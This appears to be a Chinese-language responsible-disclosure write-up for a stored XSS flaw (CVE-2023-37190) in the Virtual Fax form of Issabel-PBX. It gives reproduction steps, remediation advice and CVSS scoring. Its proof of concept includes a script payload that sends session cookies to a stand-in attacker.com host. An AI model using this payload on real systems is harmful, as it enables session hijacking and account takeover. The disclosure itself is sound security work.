| 字段 | 详情 |
|---|---|
| CVE ID | CVE-2023-37190 |
| 漏洞类型 | 存储型跨站脚本攻击(XSS) |
| 受影响产品 | Issabel-PBX |
| 受影响版本 | 4.0.0-6 |
| 严重性 | 中危(CVSS v3.1 评分:5.4) |
| 发现者 | Sahil Ojha |
| 披露日期 | 2023年7月7日 |
| 供应商 | Issabel |
| 源代码 | IssabelFoundation/issabelPBX |
| 测试环境 | Windows |
Issabel-PBX 4.0.0-6 版本存在一个**存储型跨站脚本攻击(XSS)**漏洞。应用程序在将用户提供的输入存储到数据库并随后在Web界面中呈现之前,未能正确进行清理和编码。
该漏洞存在于虚拟传真(Virtual Fax)模块,具体位于“新建虚拟传真”创建表单中。两个输入参数——虚拟传真名称和来电显示名称——未经过充分的输入验证或输出编码。这使得拥有低权限的已认证攻击者能够在应用程序中注入并永久存储恶意JavaScript载荷。
一旦存储,恶意脚本会在任何访问受影响页面的用户(包括管理员)的浏览器中自动执行,无需攻击者进行任何额外的交互。
成功利用此漏洞的攻击者可以:
由于载荷是存储型(持久性),它将影响每个访问此漏洞页面的用户,直到被移除——这使得其比反射型XSS更为严重。
虚拟传真名称来电显示名称步骤 1: 使用有效凭据登录 Issabel-PBX Web 应用程序。
步骤 2: 导航至 传真 → 虚拟传真 → 新建虚拟传真。
将以下 XSS 载荷注入虚拟传真名称和/或来电显示名称字段:
<script>alert('XSS-CVE-2023-37190')</script>
为了演示会话Cookie窃取的更有效的概念验证(注意:在实际攻击中,使用HTTPS来避免传输中暴露窃取的Cookie):
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>
填写了注入载荷的表单应类似于以下截图:

步骤 3: 点击保存按钮提交表单。载荷现已持久存储在应用程序数据库中。
步骤 4: 导航至虚拟传真列表页面(或让其他用户(如管理员)访问该页面)。存储的脚本将在访问者的浏览器中自动执行,如下所示:

Issabel-PBX 用户和管理员强烈建议采取以下措施:
<、>、"、'、&)的输入。Content-Security-Policy HTTP 头,限制脚本执行的来源,从而减少XSS漏洞的影响。Sahil Ojha
安全研究员
GitHub: @sahiloj
免责声明: 本仓库仅供教育和负责任披露目的。此处提供的信息不应被用于在未获得系统所有者明确书面许可的情况下攻击系统。作者对任何滥用此信息的行为不承担责任。
| 指标 | 值 |
|---|
| 基础分数 | 5.4(中危) |
| 攻击向量 | 网络 |
| 攻击复杂度 | 低 |
| 所需权限 | 低 |
| 用户交互 | 需要 |
| 影响范围 | 已改变 |
| 机密性 | 低 |
| 完整性 | 低 |
| 可用性 | 无 |